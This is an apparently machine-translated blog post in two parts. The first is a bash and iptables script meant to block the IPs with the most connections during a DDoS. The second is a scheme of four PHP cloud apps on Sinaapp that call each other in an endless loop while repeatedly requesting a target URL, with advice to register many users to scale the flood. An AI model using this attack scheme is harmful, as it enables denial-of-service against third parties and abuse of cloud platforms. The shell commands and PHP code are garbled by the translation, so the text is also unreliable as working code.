Server DDoS Attack Defense script summary

The server is DDoS attack Defense shell script

1. Scripting

Mkdir/root/bin

vi/root/bin/dropip.sh

#!/bin/bash

/bin/netstat-na|grep Established|awk ' {print $} ' |awk-f: ' {print $} ' |sort|uniq-c|sort-rn|head-10|grep-v-e ' 192.168 |127.0′|awk ' {if ($2!=null && $1>4) {print $}} ' >/tmp/dropip

For I in $ (CAT/TMP/DROPIP)

Todo

/sbin/iptables-a input-s $i-j DROP

echo "$i kill at ' Date '" >>/var/log/ddos

Done

2. Increased executive authority

chmod +x/root/bin/dropip.sh

3. Add to scheduled task, execute once per minute

Crontab-e

*/1 * * * */root/bin/dropip.sh

Description

The most important is the second line, which gets the top 10 IP established connections and writes the temporary file/tmp/dropip, excluding the internal IP segment 192.168| 127.0. Through the For loop, the IP inside the DROPIP is dropped all through the iptables and then written to the log file/var/log/ddos

Another way is to use PHP to write DDoS attacks, using other cloud platforms to operate

The main use of Sinaapp as a test object.

Test idea: Create 4 versions of the app.

Version 1 home code is as follows:

<php

file_get_contents (' http://2.mars.sinaapp.com/');//version 1 triggers attack (Access version 2)

>

Version 2 Home code:

<php

file_get_contents (' http://www.xxx.com/ip.php ')://Attack target

file_get_contents (' http://3.mars.sinaapp.com/');//Access version 3

>

Version 3 Home code:

<php

For ($i =1 $<=10; $i + +) {//Here's an evil, a few more effects better

file_get_contents (' http://www.xxx.com/ip.php ');

file_get_contents (' http://4.mars.sinaapp.com/'); }

>

Version 4 home code:

<php

file_get_contents (' http://2.mars.sinaapp.com/');//Access version 2, resulting in a dead loop

>

These are the steps to use a Sinaapp user to exploit, expand yourself, register a large number of users, and create more versions to attack. But in the testing process, each app actually has two IP exits. It is better to use multiple users.